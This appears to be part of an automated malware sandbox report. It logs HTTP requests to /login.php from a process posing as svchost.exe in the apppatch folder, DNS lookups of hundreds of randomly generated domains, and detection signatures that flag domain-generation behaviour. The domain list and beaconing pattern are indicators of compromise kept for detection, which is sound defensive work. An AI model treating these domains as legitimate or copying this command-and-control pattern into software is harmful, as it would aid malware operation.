Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345224\|1731345181\|21\|2\|0
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478890781963739088
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345224\|1731345181\|21\|2\|0
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478890781963739088
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygynud.com Cookie: snkz=66.23.206.109; btst=1e822420cb8d3f7ff6bc20592f4b28e8\|66.23.206.109\|1731345185\|1731345185\|0\|1\|0
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com Cookie: snkz=66.23.206.109; btst=e5cea2794c01fe0d297510f888cbb928\|66.23.206.109\|1731345186\|1731345186\|0\|1\|0
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com

Queries random domain names (often used to prevent blacklisting and sinkholes)

Source: unknown

DNS traffic detected: English language letter frequency does not match the domain names

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: qexysig.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzypug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumytup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahynus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykyjux.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebylov.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofydac.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupytyl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupydig.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyriq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujyxyl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufybyv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volydot.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyvah.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetytug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvyxil.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufymyg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purywop.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyrygyn.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofyqit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzyxyv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopyret.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujymip.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocymak.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyvuv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galypyh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galyfyb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyxuv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqyzuw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumywaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqyhuz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowydef.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqysag.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volykit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonycum.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekyxul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebyrip.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacykeh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowybof.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyneh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxymed.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyryfyd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyvoq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyhup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyhis.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegyrol.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysymux.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadypuw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqyvob.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekyheq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekykup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyryxij.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocycuc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexykug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volyzef.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyfaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyfel.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofygum.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahykih.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqykab.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonyzuf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvymul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyveg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopycom.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykygaj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacykub.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojygok.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowykaf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymyvin.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowymyk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetyrap.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonydik.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofymik.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatycoh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvyjop.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowyzuk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purydyv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatyqih.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegytyv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojykom.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopykak.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxylor.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofygaf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvymaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymylyr.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedynaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujygaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatydaw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygywor.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysywon.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galyquw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysyvud.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysysod.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyrab.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegysoq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegynap.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufygug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysyfyj.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: puvyliv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyrylix.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatyvyz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetyfop.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyfyq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purycap.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purydip.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyveb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofybyf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetyvil.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvylod.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purycul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyfuh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonyjim.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonyqok.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volypum.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykymox.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galyhiw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedysov.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacypyz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupypiv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyxov.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purytyg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganydiw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyryvex.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzyjoq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykyvod.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufyjuq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonypyf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqyzoh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqykog.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowydic.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocyrom.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganyqow.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopyjuf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumyjig.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetylyv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volymum.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumybal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocyzek.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumymuv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyrytun.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymymud.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetyquq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganycuh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galyvas.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykynyj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyqog.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopybyt.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvylyn.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahyhob.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebysul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacydib.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocymut.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatyzys.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyduz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupygel.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebytiq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupymyp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatynes.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volyqat.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzyjyg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegyqaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupycuv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvywed.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahypus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojyjof.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahycib.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyzyh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexylup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujyduv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojymic.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumypog.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonyryc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzybep.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganyzas.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyhyl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowyjut.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufydep.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyhyw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysytyr.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxyfar.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufypiq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebyrev.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacynuz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykytej.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowycac.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purypol.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxyjun.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganykaz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojyrak.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyryjir.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvytuq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocyjic.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyqiv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyvis.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojyduf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujypup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegykiq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykygur.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatyduh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebyhuq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganypih.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyrag.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowypit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahyqub.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyryw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekyqyl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyryled.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqynyw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puryjil.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxyjaj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupywog.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqyfah.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegyhev.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowykuc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocydof.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonygec.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purygeg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqytal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyqys.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekysip.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykymyr.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatyzoz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebynyg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojyjyc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexynol.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujygul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzytap.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyfob.com replaycode: Name error (3)
